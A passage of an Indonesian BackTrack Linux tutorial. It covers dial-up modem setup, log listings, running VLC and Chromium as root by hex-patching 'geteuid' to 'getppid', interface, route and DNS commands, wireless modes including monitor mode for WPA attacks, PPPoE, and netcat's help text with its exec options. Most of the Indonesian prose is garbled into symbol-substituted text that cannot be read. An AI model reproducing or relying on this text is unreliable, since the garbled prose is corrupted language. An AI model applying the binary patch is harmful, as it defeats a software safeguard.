ttyUSB1<*1>: ATQ0 V1 E1 and failed too at 115200,
giving up.
ttyUSB2<*1>: ATQ0 V1 E1 OK
ttyUSB2<*1>: ATQ0 V1 E1 Z OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 OK
ttyUSB2<*1>: Modem Identifier: ATI Manufacturer:
QUALCOMM INCORPORATED
ttyUSB2<*1>: Speed 9600: AT OK
ttyUSB2<*1>: Max speed is 9600; that should be safe.
Found a modem on /dev/ttyUSB0.
Modem configuration written to /etc/wvdial.conf.
ttyUSB0<Info>: Speed 9600; init ATQ0 V1 E1 S0=0 &C1 &D2
+FCLASS=0Q
ttyUSB2<Info>: Speed 9600; init ATQ0 V1 E1 S0=0 &C1 &D2
+FCLASS=0Q
ter.s k,#eka# &e#$a#
wvdial telkomflash &
root@bt:~# wvdial &
[1] 6460
root@bt:~# > WvDial: Internet dialer version 1.60
> Cannot get information for serial port.
> Initializing modem.
> Sending: ATZ
ATZ
OK
> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
> Sending: AT+CGDCONT=1, IP, internet
AT+CGDCONT=1, IP, internet
OK
> Modem initialized.
> Sending: ATDT*99#
> Waiting for carrier.
ATDT*99#
CONNECT
> Carrier detected. Waiting for prompt.
> Dont know what to do! Starting pppd and hoping for
the best.
> Starting pppd at Mon Feb 28 07:10:24 2011
> Pid of pppd: 6461
> pppd: 0 [08] X
> Using interface ppp0
> pppd: 0 [08] X
> pppd: 0 [08] X
> pppd: 0 [08] X
> pppd: 0 [08] X
> pppd: 0 [08] X
> pppd: 0 [08] X
> local IP address 182.4.112.169
> pppd: 0 [08] X
> remote IP address 10.64.64.64
> pppd: 0 [08] X
> primary DNS address 114.127.243.113
> pppd: 0 [08] X
> secondary DNS address 114.127.208.84
> pppd: 0 [08] X
root@bt:~#
root@bt:~# > pppd: 0 [08] X
> Connect time 42.5 minutes.
> pppd: 0 [08] X
> pppd: 0 [08] X
> pppd: 0 [08] X
> Disconnecting at Mon Feb 28 07:52:57 2011
> The PPP daemon has died: A modem hung up the phone
(exit code = 16)
> man pppd explains pppd error codes in more detail.
> Try again and look into /var/log/messages and the
wvdial and pppd man pages for more information.
> Auto Reconnect will be attempted in 5 seconds
> Cannot open /dev/ttyUSB0: No such file or directory
> Disconnecting at Mon Feb 28 07:52:58 2011
[1]+ Exit 1 wvdial
root@bt:~#
..%. Gno5e+666 , K666
(#t.k <!&ia% /er/asis $.i /isa -e#$$.#aka# $#,-e222 .#t.k 2ara 2e#$$.#a
$#,-e ata. k222 .#t.k 2e#$$.#a k&e. Kita &a2at -e#$is#ta% ke&.a a%ter#ati!e
2aket terse/.t %a#$s.#$ &ari &istr,
root@bt:~# apt-get install gnome-ppp
root@bt:~# apt-get install kppp
set.2 aka# -e-/.at sh,rtc.t ic,# &i ta/ i#ter#et ata. kita /isa 2a#$$i% s,+t<are
terse/.t &e#$a# 2eri#tah &i c,#s,%e
root@bt:~# gnome-ppp &
&. ANA0EEN 'OG
&.$ e/i2at /o1 terak2ir dari akti=itas 4ser
root@bt{~/Documents/tools}:lastlog
Username Port From Latest
root tty1 Sat Dec 17 09:40:11 +0700 2011
daemon **Never logged in**
bin **Never logged in**
sys **Never logged in**
sync **Never logged in**
games **Never logged in**
man **Never logged in**
lp **Never logged in**
mail **Never logged in**
news **Never logged in**
uucp **Never logged in**
proxy **Never logged in**
www-data **Never logged in**
backup **Never logged in**
list **Never logged in**
irc **Never logged in**
gnats **Never logged in**
libuuid **Never logged in**
syslog **Never logged in**
sshd **Never logged in**
landscape **Never logged in**
messagebus **Never logged in**
nobody **Never logged in**
mysql **Never logged in**
avahi **Never logged in**
snort **Never logged in**
statd **Never logged in**
usbmux **Never logged in**
pulse **Never logged in**
rtkit **Never logged in**
festival **Never logged in**
postgres **Never logged in**
aip **Never logged in**
asuka **Never logged in**
zee **Never logged in**
haldaemon **Never logged in**
jetty **Never logged in**
snmp **Never logged in**
james0baster tty1 Fri Aug 26 01:49:00 +0700 2011
ares tty1 Sun Oct 30 09:34:42 +0700 2011
clamav **Never logged in**
tama **Never logged in**
&.% Akses /o1 bebera6a ser=ice ? D=arD/o1 @
root@bt{/var}:cd log
./ debug.4.gz mail.log rinetd.log.4
../ dist-upgrade/ mail.log.1 rinetd.log.5
3proxy/ dmesg mail.warn rinetd.log.6
apache2/ dmesg.0 messages rinetd.log.7
apt/ dmesg.1.gz messages.1 samba/
aptitude dmesg.2.gz messages.2.gz snort/
aptitude.1.gz dmesg.3.gz messages.3.gz squid3/
aptitude.2.gz dmesg.4.gz messages.4.gz syslog
aptitude.3.gz dpkg.log msfupdate.log syslog.1
auth.log dpkg.log.1 mysql/ syslog.2.gz
auth.log.1 dpkg.log.2.gz mysql.err syslog.3.gz
auth.log.2.gz dpkg.log.3.gz mysql.log syslog.4.gz
auth.log.3.gz dpkg.log.4.gz mysql.log.1.gz syslog.5.gz
auth.log.4.gz faillog mysql.log.2.gz syslog.6.gz
autoscan-network/ fontconfig.log mysql.log.3.gz syslog.7.gz
boot fsck/ mysql.log.4.gz sysstat/
boot.log installer/ mysql.log.5.gz udev
bootstrap.log iptraf/ mysql.log.6.gz ufw.log
clamav/ ircd/ mysql.log.7.gz unattended-
upgrades/
ConsoleKit/ jetty/ news/ user.log
cups/ kern.log nvidia-installer.log user.log.1
daemon.log kern.log.1 pm-powersave.log user.log.2.gz
daemon.log.1 kern.log.2.gz pm-powersave.log.1 user.log.3.gz
daemon.log.2.gz kern.log.3.gz pm-powersave.log.2.gz user.log.4.gz
daemon.log.3.gz kern.log.4.gz pm-powersave.log.3.gz vbox-
install.log
daemon.log.4.gz landscape/ pm-powersave.log.4.gz wicd/
dbconfig-common/ lastlog pycentral.log wtmp
debug lpr.log rinetd.log wtmp.1
debug.1 mail.err rinetd.log.1 wvdialconf.log
debug.2.gz mail.info rinetd.log.2 Xorg.0.log
debug.3.gz mail.info.1 rinetd.log.3 Xorg.0.log.old
9. M(LT*MED*A ? M*SC
Di Ba/ i#i kita aka# -e#$i#sta%% M.%ti-e&ia 2%a"er &a# /e/ara2a t,,%s "a#$
sa-aki# -e-.&ahka# kita.
List#"aQ
VLC Me&ia 4%a"er
Ch,r,-i.- @G,,$%e Chr,-e )SEB
S"#a2tic
(/.#t. S,+t<are Ce#ter
4i&$i#
4D8 Rea&er
A. ('C
B.ka ter-i#a% se2erti /iasa. Ketika#Q
*#sta%% se2erti /iasa> #a-.- /e%.- /isa &ija%a#ka# kare# kita -e#$$.#aka# .ser
Ir,,tJ. )2rek se&ikit !%c#"a.
B.ka ter-i#a%> ketika#Q
r,,tS/tQWT a2t$et i#sta%% !%c
Teka# XTABY .#t.k stri#$ -,&e. Cari I$ette.i&J &a#$a# -e#eka# ICTRLZSJ $a#ti
&e#$a# I$et22i&J. Sa!e &e#$a# ICTRL Z SJ> c,/a ja%a#ka#.
". C2ro5i45
Chr,-i.- c.k.2 ri#$a#> -aka c,/a%ah .#t.k -e#$$.#aka##"a. B.ka ter-i#a%
se2erti /iasa %a$i.
T.#$$. hi#$$a i#sta%%asi se%esai.
Sa-a se2erti VLC Chr,-i.-/r,<ser &e+a.%t ti&ak &a2at &ija%a#ka# ,%eh r,,t.
B.ka he1e&it,r %a$i.
r,,tS/tQWT he1e&it A.srA/i#A!%c
r,,tS/tQWT a2t$et chr,-i.-/r,<ser
r,,tS/tQWT he1e&it A.srA%i/Achr,-i.-/r,<serAchr,-i.-
/r,<ser
Teka# XTABY. Cari IgetueidJ ./ah -e#ja&i IgetppidJ. Teka# I+(R,45J .#t.k
ke%.ar
B. UPDATE , UPGRADE
Ste2/"ste2 BackTrack "a#$ a#&a /.at -.%ai /a#$kit> sekara#$ <akt.#"a .#t.k
-e#$.2&ate &a# .2$ra&e.
B.ka ter-i#a% ke-/a%i ke-.&ia# ketika#
Sete%ah se%esai> %a#j.t.
Saat &i-i#ta 2erset.j.a#Q IYJ XE#terY. T.#$$. hi#$$a &,<#%,a& se%sai> &e#$a#
&e-ikia# -aka BackTrack te%ah ter.2$ra&e.
r,,tS/tQWT a2t$et .2&ate
r,,tS/tQWT a2t$et &ist.2$ra&e
"A" II
'EARN NET!ORKING !ITH "ACKTRACK
Oleh : zee eichel
$. 'OCA' AREA NET!ORK
L,ca% Area Net<,rk ata. /iasa kita ke#a% &e#$a# si#$kata# 'AN> -e-i%iki &.a
je#is jika &i %ihat &ari a2a "a#$ -e#ja&i -e&ia#"a. Ya#$ 2erta-a kita ke#a% &e#$a#
wired @ cable B ata. wire/ess @ non6cable B &i -a#a <ire& -e#$$.#aka# ka/e%
se2erti (T4 @ )nshielded t0isted pair B se&a#$ka# <ire%ess -e#$$.#aka# udara
.#t.k -e&ia 2e#$ha#tar#"a.
$.$ "asic co55and
Se2erti "a#$ kita tah.> &a%a- siste- ,2erasi %i#.1 se/e#ar#"a i#ter+ace s.&ah
&ita#&ai &e#$a# si-/,%ik secara &e+a.%t. 4a&a kart. jari#$a# "a#$ 2erta-a ter&eteksi
@ ether#et E N*CA#et<,rk i#ter+ace car& B siste- aka# -e-/aca#"a &e#$a# se/.ta#
Iet2>J &a# aka# &i .r.tka# 2a&a N*C se%a#j.t#"a. Misa%#"a sa"a -e-i%iki ' N*C
ter2asa#$ 2a&a s%,t 2ci sa"a > -aka %i#.1 aka# -e-/aca#"a &e#$a# eth;> eth1 &a#
seter.s#"a. Se/a$ai-a#a ether#et > <ire%ess i#ter+ace j.$a &i /erika# si-/,%ik
&e+a.%t a$ar -.&ah -e-/e&aka# a#tara jari#$a# ether#et &a# jari#$a# <ire%ess
i#ter+ace. Secara &e+a.%t %i#.1 aka# -e-/erika# si-/,% Iw/an>J terha&a2 <ire%ess
i#ter+ace /aik &ari (SB <ire%ess ata.2.# &e!ice <ire%ess %ai##"a. Dasar E &asar
c,--a#& terha&a2 2e#$e%,%aa# i#ter+ace 2a&a /acktrack %i#.1.
$.$.$ e/i2at inter3ace 7an1 tersedia ata4 s4da2 terdeteksi @ i3con3i1 B
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:36:c7:8d:54
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX bytes:52033 (52.0 KB) TX bytes:52033 (52.0 KB)
wlan0 Link encap:Ethernet HWaddr 00:19:d2:45:4d:96
inet addr:192.168.1.9 Bcast:192.168.1.255
Mask:255.255.255.0
inet6 addr: fe80::219:d2ff:fe45:4d96/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
TX packets:15175 errors:0 dropped:0 overruns:0
carrier:0
RX bytes:11561853 (11.5 MB) TX bytes:4427559 (4.4 MB)
Ter%ihat 2a&a 2eri#tah &i atas /ah<a sa"a -e-i%iki et2> @ ether#et B "a#$ /e%.-
terk,#eksi ata. /e%.- &i /eri *4 a&&ress &a# jari#$a# w/an> "a#$ te%ah terk,#eksi
&e#$a# inet addr:192.168.1.9. Jika kita i#$i# -e%ihat ti2e i#ter+ace terte#t..
S"#ta1 Q i3con3i1 G inter3ace H
c,#t,h jika sa"a ha#"a i#$i# -e%ihat i#ter+ace <%a#;
root@bt:~# ifconfig wlan0
inet addr:192.168.1.9 Bcast:192.168.1.255 Mask:255.255.255.0
RX bytes:11607435 (11.6 MB) TX bytes:4433405 (4.4 MB)
De#$a# 2eri#cia# hasi% ,.t2.t
Hwaddr : 00:19:d2:45:4d:96 // merupakan mac address
dari interface wlan0
inet addr : 192.168.1.9 // ip address pada interface
Bcast : 192.168.1.255 // ip broadcasting pada network
mask : 255.255.255.0 // Netmask network dalam contoh
ini tipe C
Interface status : UP
Broadcast status : broadcast
MTU ( Maximum transmission unit ) : 1500
Multicast status : Multicast , IPv6
$.$.% Akti3 dan enon+akti3kan inter3ace tertent4 ? UPDDO!N @.
s7nta< C i3con3i1 G inter3ace H G 46 J down H
root@bt:~# ifconfig wlan0 up // untuk menghidupkan atau
mengaktifkan interface wlan0
root@bt:~# ifconfig wlan0 down // untuk menon-aktifkan
interface wlan0
$.$.9. Statik IP address
Kita &a2at -e-/erika# statik i2 jika -e-a#$ &i /.t.hka# &e#$a# -e#$ik.ti s"#ta1
&i /a<ah i#i
s7nta< C i3con3i1 G inter3ace H G i6+addressH net5ask G ni/ai+net5ask H
-as.ka# i#ter+ace "a#$ a#&a i#$i#ka# > &a%a- c,#t,h i#i sa"a -e#$$.#aka# <%a#;
se/a$ai i#ter+ace sa"a. Ke-.&ia# -as.ka# i2 a&&ress "a#$ he#&ak a#&a -as.ka#
&iik.ti &e#$a# #et-ask. Se2erti 2a&a c,#t,h &i /a<ah i#i
root@bt:~# ifconfig eth0 192.168.1.43 netmask 255.255.255.0
root@bt:~# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:16:36:c7:8d:54
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16
$.$.) De3a4/t Gatewa7
s7nta< C ro4te add de3a4/t 1atewa7 Gi6+1atewa7H
Se/a$ai c,#t,h sa"a aka# -e-as.ka# &e+a.%t $ate<a" 1:'.169.1.1
rootKbtCLM ro4te add de3a4/t 1atewa7 $B%.$.A.$.$
Ke-.&ia# sa"a cek i2 $ate<a" jika -e-a#$ s.&ah /e#ar -e#ja&i 1:'.169.1.1
root@bt:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use
Iface
192.168.1.0 * 255.255.255.0 U 0 0 0
wlan0
192.168.1.0 * 255.255.255.0 U 0 0 0
eth0
default 192.168.1.1 0.0.0.0 UG 0 0 0
wlan0
$.$.* DNS
(#t.k -e#a-/ahka# &#s secara -a#.a% se/e#ar#"a ha#"a ti#$$a% -e#$e&it +i%e
k,#+i$.rasi 2a&a &irekt,ri EDetcDreso/=.con3F $.#aka# e&it,r kesa"a#$a# kita &a#
kita e&it ses.ai &e#$a# ke/.t.ha# .
root@bt:~# cat /etc/resolv.conf
nameserver 8.8.8.8
nameserver 8.8.4.4
Ta-2ak 2a&a ,.t2.t &iatas sa"a -e-as.ka# &#s $,,$%e "ait. 9.9.9.9 &a# 9.9.3.3
ke-.&ia# sa"a c,/a cek &e#$a# -e#$$.#aka# 2eri#tah nslookup1
root@bt:~# nslookup google.com
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
Name: google.com
Address: 74.125.236.82
Name: google.com
Address: 74.125.236.80
Name: google.com
Address: 74.125.236.84
Name: google.com
Address: 74.125.236.83
Name: google.com
Address: 74.125.236.81
Hasi% ,.t2.t s.&ah -e#.#j.ka# /ah<a &#s te%ah -e#$arah ke2a&a 9.9.9.9.
$.$.. Inter3aces 3i/e con3i14ration
K,#+i$.rasi -a#.a% secara DHC4 ata.2.# statik &a2at a#&a te-.ka# 2a&a &irekt,ri
EDetcDnetworkDinter3acesF C,#t,h k,#+i$.rasi DHC4 a&a%ah se2erti &i /a<ah i#i
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
auto eth1
auto eth2
auto ath0
iface ath0 inet dhcp
auto wlan0
iface wlan0 inet dhcp
Se&a#$ka# jika kita he#&ak k,#+i$.rasi sa%ah sat. i#ter+ace -e#ja&i statik > e&it%ah
+i%e ta&i -e#ja&i se2erti c,#t,h &i /a<ah i#i
auto lo auto lo
iface lo inet loopback iface lo inet loopback
auto eth0 auto eth0
iface eth0 inet static iface eth0 inet dhcp
address 208.88.34.106
netmask 255.255.255.248
broadcast 208.88.34.111
network 208.88.34.104
gateway 208.88.34.110
%. !IRE'ESS CONFIGURATION , COAND 'INE
Se2erti "a#$ s.&ah kita /ahas se/e%.-#"a /ah<a site- %i#.1
aka# -e-/aca i#ter+ace <ire%ess secara &e+a.%t se/a$ai Iw/an>J
se/a$ai <ire%ess %a# "a#$ ter&eteksi. Berik.t kita aka#
-e-/ahas /e/era2a 2eri#tah &asar secara CL* @ command line
interface B "a#$ /iasa &i se/.t se/a$ai <i+i+. @ k.#$+.
<ire%ess B
%.$ ESSID scannin1 s46ort
s7nta< C iw/ist G inter3ace H scann
[root@bt ~]$ sudo ifconfig wlan0 up
[root@bt ~]$ iwlist wlan0 scann
wlan0 Scan completed :
Cell 01 - Address: 00:1E:C1:4C:BF:F8
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=70/70 Signal level=-33 dBm
Encryption key:on
ESSID:"ibteam-3g"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s;
6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s;
54 Mb/s
Mode:Master
Extra:tsf=0000000833cf9181
Extra: Last beacon: 599ms ago
IE: Unknown: 000969627465616D2D3367
IE: Unknown: 010882848B0C12961824
IE: Unknown: 03010B
IE: Unknown: 0706474220010D14
IE: Unknown: 200100
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown:
DD180050F2020101030003A4000027A4000042435E0062322F00
IE: Unknown: DD0900037F01010020FF7F
4erhatika# &ari ,.t2.t &i atas kita &a2at -e%ihat /ah<a i#ter+ace te%ah
-e#$.-2.%ka# i#+,r-asi /er.2a
ESS*D Q i/tea-0$ AA na5a access 6oint
Cha##e% Q 11 AA c2anne/ access 6oint
E#cr"2ti,# ke"Q,# AA terenskri6si G w6eDw6aDw6a% H
%.% ode ana1e5ent
%.%.$ ode aster
s7nta< C iwcon3i1 G inter3ace H 5ode 5aster
Jika kita he#&ak -e-/erika# -,&e -aster ata. -,&e se/a$ai access 2,i#t @A4B >
he#&ak#"a kita -e#$ecek ter%e/ih &ah.%. &e#$a# 2eri#tah Ii<J
[root@bt]# iw list
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* WDS
* monitor
mesh point
Ka%a. s.&ah s.22,rt kita /erika# c,--a#& .#t.k -e-eri#tahka# i#ter+ace -as.k
2a&a -,&e I5asterJ.
Xroot@bt]# iwconfig wlan0 mode master
Jika kita he#&ak -e-/eri essi& .#t.k i#ter+ace <ire%ess kita kita /isa $.#aka#
2eri#tah &i /a<ah.
s7nta< C iwcon3i1 G inter3ace H G ESSID H G essid 7an1 di ke2endaki H
%.%.%. ode 5ana1ed
s7nta< C iwcon3i1 G inter3ace H 5ode 5ana1ed
4eri#tah &i atas a&a%ah .#t.k -e-i#&ahka# i#ter+ace -as.k ke -,&e -a#a$e&
@ c%ie#t B. A#&a aka# /erti#&ak se/a$ai c%ie#t "a#$ #a#ti#"a /isa tersa-/.#$
terha&a2 A4.
[root@bt]# iwconfig wlan0 mode managed
%.%.9. ode Add+2oc
s7nta< C iwcon3i1 G inter3ace H 5ode ad+2oc
T.j.a# &ari s"#ta1 &i atas a&a%ah -e#$eset kart. a#&a se/a$ai a#$$,ta &i jari#$a#
<i+i a& h,c ta#2a akses 2,i#. Sa#$at /er$.#a .#t.k shari#$ &ata &a# i#ter#et secara
Ipeer to peer 7
[root@bt]# iwconfig wlan0 mode ad-hoc
%.%.). ode onitor
s7nta< C iwcon3i1 G inte3ace H 5ode 5onitor
T.j.a# &ari s"#ta1 &iatas a&a%ah -e#$eset kart. a#&a se/a$ai -,&e -,#it,r > sa#$at
/er$.#a #a#ti#"a 2a&a saat kita -e%ak.ka# sera#$a# <2a<2e. Biasa#"a /isa
-e#$$.#aka# air-,#. Me#$e#ai sera#$a# terha&a2 A4 tere#skri2si aka# kita /ahas
2a&a %e!e% /erik.t#"a.
Berik.t i#i a&a%ah /e/era2a %a#$kah%a#$kah k,#ekti+itas <ire%ess i#ter+ace
%.%.* O6enD!EP !'AN ?DHCP@
-e#$k,#eksika# i#ter+ace kita terha&a2 A4 tere#skri2si =4E "a#$ s.22,rt terha&a2
DHC4 2r,t,c,% > %ak.ka# %a#$kah%a#$kah &i /a<ah i#i
Set -,&e -a#a$e& ke" @ =E4 ke" B
root@bt:#iwconfig [interface] mode managed key [WEP key]
set essi&
root@bt:#iwconfig [Interface] essid "[ESSID]"
Me-/erika# *4 a&&ress secara -a#.a%
root@bt:#ifconfig [interface] [IP address] netmask
[subnetmask]
c,#t,h Q ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
Me#a-/ahka# $ate<a"
root@bt:#route add default gw [IP of default gateway] AA
k,#+i$.rasi &e+a.%t $ate<a". Biasa#"a -er.2aka# i2 a&&ress access2,i#t
Me#a-/ahka# DNS ser!er
root@bt:#echo nameserver [IP address of DNS server] >>
/etc/resolve.conf
c,#t,h Q root@bt:#echo nameserver 8.8.8.8 >>
/etc/resolv.conf
%.%.. Set 5ode 5ana1ed ke7 ? !EP ke7 @
i<c,#+i$ Xi#ter+aceY -,&e -a#a$e& ke" X=E4 ke"Y AA 1'9 /it =E4 -e#$$.#aka# '6
he1 characters> 63 /it =E4 ha#"a -e#$$.#aka# 1;B
C,#t,h Q
i<c,#+i$ Xi#ter+aceY ke" 1111111111111111
@-e#$eset k.#ci =E4 1'9/itB
i<c,#+i$ Xi#ter+aceY ke" 11111111 @-e#$eset
k.#ci =E4 65 /itB
%.%.&. ESSID
Me-/erika# IESS*DJ 2a&a i#ter+ace <ire%ess.
root@bt:#iwconfig [Interface] essid "[ESSID]"
%.%.A DHCP C/ient
ReU.est DHC4 c%ie#t @ .#t.k r,.ter "a#$ s.22,rt DHC4 B .#t.k -e#eri-a *4
a&&ress> #et-ask> DNS ser!er &a# &e+a.%t $ate<a" &ari Access 4,i#tB
root@bt:#dhclient [interface]
%.9. Da3tar 6erinta2 /ainn7a
%.9.$ Iwcon3i1 co55andsC
i<c,#+i$ Xi#ter+aceY ke" sQ-"ke" @set ke" se/a$ai ASC** stri#$B
i<c,#+i$ Xi#ter+aceY ke" ,++ @&isa/%e =E4 ke"B
i<c,#+i$ Xi#ter+aceY ke" ,2e# @sets ke ,2e# -,&e> ti&ak -e-/.t.hka#
a.the#ticati,# B
i<c,#+i$ Xi#ter+aceY cha##e% Xcha##e% #,.Y @set cha##e% 113B
i<c,#+i$ Xi#ter+aceY cha##e% a.t, @secara ,t,-atis -e-i%ih cha##e% B
i<c,#+i$ Xi#ter+aceY +reU '.3''G @set cha##e%s &a%a- /e#t.k GHHB
i<c,#+i$ Xi#ter+aceY a2 11Q11Q11Q11Q11Q11 @ -e-aksa kart. .#t.k -e#&a+tar 2a&a A4
&e#$a# BSS*D terte#t.B
i<c,#+i$ Xi#ter+aceY rate 11M @ -e#$$.#aka# kece2ata# terte#t. B
i<c,#+i$ Xi#ter+aceY rate a.t, @ -e#$$.#aka# kece2ata# secara a.t,-atis A ra#&,- B
i<c,#+i$ Xi#ter+aceY rate a.t, 5.5M @ kart. aka# -e#$$.#aka# kece2ata# terte#t.
&a# kece2ata# &i /a<ah#"a jika -e-a#$ &i2er%.ka#B
%.9.% iw/ist Co55andsC
i<%ist is .se& t, &is2%a" s,-e %ar$e ch.#k ,+ i#+,r-ati,# +r,- a <ire%ess #et<,rk
i#ter+ace that is #,t &is2%a"e& /" i<c,#+i$.
i<%ist Xi#ter+aceY sca# @-e-/erika# %ist Access 4,i#ts a#& A&H,c "a#$ ter&eteksi
&a%a- ra#$e serta -e-/erika# i#+,r-asii#+,r-asi se2erti ESS*D> D.a%it">
8reU.e#c"> M,&e.
i<%ist Xi#ter+aceY cha##e% @-e#a-2i%ka# %ist &ari +reU.e#cies 2a&a &e!ice &a#
cha##e%B.
i<%ist Xi#ter+aceY rate @-e%ihat &a+tar &e!ice s.2,rt /itrates B.
i<%ist Xi#ter+aceY ke" @&a+tar /esar e#skri2si ke" "a#$ s.22,rt &a# -e#a-2i%ka#
se-.a e#skri2si ke" "a#$ a&a 2a&a &e!iceB.
i<%ist Xi#ter+aceY 2,<er @-e#a-2i%ka# !ariasi 4,<er Ma#a$e-e#t attri/.tes &a#
-,&e 2a&a &e!iceB.
i<%ist Xi#ter+aceY t12,<er @-e#a-2i%ka# !ariasi i#+,r-asi Tra#s-it 4,<er "a#$
a!ai%a/%e 2a&a &e!iceB.
i<%ist Xi#ter+aceY retr" @-e#a-2i%ka# tra#s-it retr" %i-its &a# retr" %i+eti-e &ari
&e!iceB.
i<%ist Xi#ter+aceY a2 @-e#a-2i%ka# &a+tar Access 4,i#ts &a%a- ra#$eB
i<%ist Xi#ter+aceY 2eers @-e-/erika# %ist a&&h,c "a#$ tere$ister 2a&a i#ter+aceB.
i<%ist Xi#ter+aceY e!e#t @-e-/erika# &a+tar e!e#t "a#$ &i s.22,rt 2a&a &e!iceB.
9. PPPOE
PPPoE a&a%ah se/.ah 2r,t,c,% jari#$a# .#t.k -e%ak.ka# e#ka2s.%asi +ra-e -oint6
to6-oint Protoco/?PPP@ &i &a%a- 2aket Ether#et> /iasa#"a &i2akai .#t.k jasa
%a"a#a# ADS' .#t.k -e#$h./.#$ka# -,&e- ADS' &i &a%a- jari#$a# Metr,
Ether#et. Biasa#"a jika kita he#&ak -e%ak.ka# 2e#"era#$a# -e%a%.i NAT @ jari#$a#
i#ter#et B kita -e-/.t.hka# *4 a&&ress secara public.
(#t.k -e#$akti+ka# k,#eksi 222 2a&a siste- ,2erasi /acktrack > kita ti#$$a%
-e#$$.#aka# 2eri#tah IpppoeconfJ -as.k ke ter-i#a% ke-.&ia# aka# ta-2i%
/e/era2a 2erta#"aa#
Na#ti#"a a#&a &i -i#ta .#t.k -e-as.ka# .ser #a-e &a# 2ass<,r& &ari is2 a#&a.
Ke-.&ia# cek k,#ekti!itas &e#$a# -e#$etika# Ii/con/ig ppp,J 2a&a ter-i#a%.
Ja#$a# %.2a /ah<a -,&e- r,.ter har.s /era&a 2a&a 2,sisi se/a$ai IbridgeJ
*. Netcat T2e Swiss Ar57 Kni3e
Netcat a&a%ah t,,%s "a#$ sa#$at &i $e-ari ,%eh ka%a#$a# 2e#tester kare#a
-e-i%iki /a#"ak ke-a-2.a# "a#$ -e#$a$.-ka#. Netcat &e#$a# j.%.ka# I
*0iss Army $nife I se/e#ar#"a -er.2aka# t,,%s "a#$ -e-i%iki ke-a-2.a#
.#t.k -e#.%is &a# -e-/aca &ata ke 2,rt TC4 &a# (D4> sehi#$$a #etcat
-e-i%iki ' se$i k,#eksi "ait. se/a$ai c%ie#t &a# se/a$ai ser!er @ %iste#er B
*.$. en114nakan Netcat
*.$.$. He/6 ? +2 @
(#t.k -e%ihat ,2si,2si &a# cara 2e#$$.#aa# #etcat secara .-.- > kita ha#"a har.s
-e#a-/ahka# E h @ he%2A #c h B
root@eichel:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec
[dangerous!!]
-e filename program to exec after connect
[dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports
scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of
secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
*.$.%. en124b4n1kan netcat ke 6ort TCP dan UDP
Me#$$.#aka# #etcat &e#$a# k,#ekti!itas 2a&a TCP &a# UDP se/e#ar#"a -e-i%iki
0 -a#+aat
$. Me#$etah.i 2,rt ter/.ka ata. ti&ak @ ,2e# 2,rt B
%. Me#$a-/i% i#+,r-asi hea&er ser!ice terte#t. 2a&a 2,rt terte#t.
9. Me%ak.ka# k,#ekti!itas -a#.a% terha&a2 ser!ice terte#t.
*#+,r-asi ter/.ka ata. ti&ak#"a se/.ah 2,rt serta i#+,r-asi se/.ah ser!ice terte#t.
&a2at kita te-.ka# &e#$a# +,r-asi si /a<ah i#i
netcat -vv [ipadd/host] [port]
4erhatika# 2a&a $a-/ari &i atas> h,st 1:'.169.1.: -e-i%iki ser!ice ssh &a#
&i#"ataka# ter/.ka# @ ,2e# B &e#$a# i#+,r-asi SSH-2.0-
OpenSSH_5.3p1 Debian-3ubuntu6.
(#t.k -e%ihat i#+,r-asi hea&er ser!ice terte#t. kita /isa -e#$$.#aka# ,2si
!# ata. ,2si se/e%.-##"a !!. )2si # se/e#ar#"a -er.2aka# ,2si a$ar
#etcat ha#"a -e-/aca tar$et &e#$a# #.-eric i2 a&&ress @#,# E &#s B.
Ga-/ar &i atas a&a%ah sa%ah sat. c,#t,h -e#$a-/i% i#+,r-asi hea&er &ari 2,rt '1
"a#$ -er.2aka# 2,rt sta#&art &ari +t2 ser!ice.
*.$.9. 'istenin1
Se2erti "a#$ s.&ah &i je%aska# se/e%.-#"a> #etcat se/e#ar#"a a&a%ah t,,%s "a#$
-e#$k,#eksika# a#tara ' h,st ata. %e/ih &e#$a# se/.ah ser!er se/a$ai %iste#er.
